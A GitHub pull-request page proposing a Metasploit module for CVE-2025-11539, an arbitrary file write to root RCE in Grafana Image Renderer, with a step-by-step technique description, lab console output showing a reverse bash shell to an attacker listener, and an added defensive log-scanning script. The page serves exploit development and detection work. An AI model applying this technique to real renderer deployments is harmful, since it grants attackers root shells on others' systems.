Add Grafana Image Renderer arbitrary file write RCE module (CVE-2025-11539)#21055

Open
exploitintel wants to merge 4 commits into rapid7:master from exploitintel:add-grafana-renderer-file-write-rce

Conversation

@exploitintel

Summary

  • Adds a new exploit module for CVE-2025-11539, an arbitrary file write to RCE in Grafana Image Renderer 1.0.0 through 4.0.16
  • The /render/csv endpoint lacks validation of the filePath parameter, allowing an authenticated attacker (default token is a single hyphen -) to write arbitrary content to any path on the renderer filesystem
  • The module escalates the file write to RCE by dropping a shell snippet into /etc/chromium.d/, which the Debian Chromium wrapper sources on every Chromium launch
  • A raw TCP socket is held open to stall sendFile via TCP backpressure, preventing the server's unlink callback from firing until after Chromium sources the snippet

Technique

  1. Serve a download trigger HTML page (JavaScript Blob) from a local HTTP server
  2. Send /render/csv?url=<attacker-http>&filePath=/etc/chromium.d/msf via a raw TCP socket (response body intentionally not read)
  3. Renderer navigates Chromium to attacker URL, JS triggers a Blob download, chokidar detects it and fs.copyFileSync writes it to the target path
  4. sendFile stalls on the unread TCP socket — file is NOT deleted
  5. A /render request on a fresh connection launches a new Chromium process, the wrapper sources /etc/chromium.d/*, payload fires

Verification

Tested against Grafana Image Renderer 4.0.16 / Debian 12 bookworm (Docker lab):

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > check

[+] 192.168.240.4:8081 - The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > run -z

[*] Started reverse TCP handler on 192.168.240.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Starting download server on 192.168.240.3:8888
[*] Writing snippet to /etc/chromium.d/msf via /render/csv
[*] Waiting for renderer to fetch payload...
[+] Download served -- snippet delivered to renderer
[*] Waiting for file write and sendFile stall...
[*] Triggering Chromium launch via /render
[+] Render triggered -- payload executing
[*] Command shell session 1 opened (192.168.240.3:4444 -> 192.168.240.4:48586) at 2026-03-04 17:01:24 +0000

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > sessions -c "id && hostname && uname -a && cat /etc/os-release | head -3" -i 1

[*] Running 'id && hostname && uname -a && cat /etc/os-release | head -3' on shell session 1 (192.168.240.4)
uid=0(root) gid=0(root) groups=0(root)
Linux 6.12.69-linuxkit #1 SMP x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"

Module details

  • Affected versions: Grafana Image Renderer 1.0.0 through 4.0.16
  • Auth required: Default token only (-) — effectively unauthenticated in many deployments
  • Targets: Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
  • AutoCheck: Yes — confirms file write via /render with auth token
  • Rank: Excellent
  • OS requirement: Debian/Ubuntu with /usr/bin/chromium wrapper (sources /etc/chromium.d/*)

References
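A defender-side companion to the file-write step of the technique above, added here and not part of this PR or of the Grafana project: the path-containment check the description says /render/csv lacks, plus a scan over constructed access-log lines for filePath values that escape an assumed output directory. The log format, ALLOWED_BASE and the sample lines are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumed: the directory a renderer should confine CSV output to (not a real Grafana setting).
ALLOWED_BASE = "/tmp/renderer-csv"

# Common-log-format line: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def resolve_file_path(base, file_path):
    """Return the normalized path if file_path stays under base, else None.

    posixpath.join discards base when file_path is absolute, and normpath collapses
    '..' segments, so both absolute paths and traversal end up outside base.
    commonpath (not startswith) also rejects sibling-prefix tricks like base + '-x'.
    """
    candidate = posixpath.normpath(posixpath.join(base, file_path))
    if posixpath.commonpath([base, candidate]) != posixpath.normpath(base):
        return None
    return candidate


def scan_access_log(lines, base=ALLOWED_BASE):
    """Flag /render/csv requests whose filePath (already URL-decoded by parse_qs) escapes base."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/render/csv":
            continue
        for fp in parse_qs(parts.query).get("filePath", []):
            if resolve_file_path(base, fp) is None:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "filePath": fp, "status": int(m.group("status"))})
    return findings


# Constructed sample log: one benign CSV export, the write path from the PR description,
# an ordinary /render call, and a '..' traversal to a harmless location.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2026:17:01:10 +0000] "GET /render/csv?url=http%3A%2F%2Fgrafana%3A3000%2Fd%2Fabc&filePath=weekly.csv HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Mar/2026:17:01:20 +0000] "GET /render/csv?url=http%3A%2F%2F10.0.0.9%3A8888%2F&filePath=%2Fetc%2Fchromium.d%2Fmsf HTTP/1.1" 200 -',
    '10.0.0.9 - - [04/Mar/2026:17:01:21 +0000] "GET /render?url=http%3A%2F%2Fgrafana%3A3000%2Fd%2Fabc HTTP/1.1" 200 9000',
    '10.0.0.7 - - [04/Mar/2026:17:02:00 +0000] "GET /render/csv?url=http%3A%2F%2Fgrafana%3A3000&filePath=..%2F..%2Fvar%2Ftmp%2Fout.csv HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A stalled sendFile (step 4) leaves no distinct log line of its own, so pair this scan with a file-integrity watch on /etc/chromium.d/ when you host the renderer on Debian or Ubuntu.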

@smcintyre-r7
Contributor

This one also has extra files and commits in the PR that are not aligned with the description. Can you please drop the extra modules?

@smcintyre-r7 added the labels "module", "needs-docs" and "rn-modules" (release notes for new or majorly enhanced modules) on Mar 4, 2026
@github-actions

github-actions bot commented Mar 4, 2026

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@exploitintel force-pushed the add-grafana-renderer-file-write-rce branch from af8f303 to 9b666cb on March 4, 2026 21:06
Grafana Image Renderer 1.0.0 through 4.0.16 allows arbitrary file
write via path traversal in the filePath parameter of /render/csv.
The module authenticates with the default auth token, writes a shell
snippet to /etc/chromium.d/ (sourced by the Debian Chromium wrapper
on every launch), then triggers a /render request to execute the
payload. A raw TCP socket held open prevents sendFile from completing,
keeping the file in place until Chromium sources it.

Targets: Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
Tested against Grafana Image Renderer 4.0.16 / Debian 12 (bookworm)
@exploitintel force-pushed the add-grafana-renderer-file-write-rce branch from 9b666cb to 6ea0d87 on March 4, 2026 21:26
@exploitintel
Author

Thanks for flagging! Same here — the branch only contains the two commits for this module (the exploit + doc). Could you take another look? Let me know if anything still looks off.

…-2025-11539)

Drop Linux Dropper target and CmdStager mixin in favor of a single
Linux/Unix Command target with fetch payload default.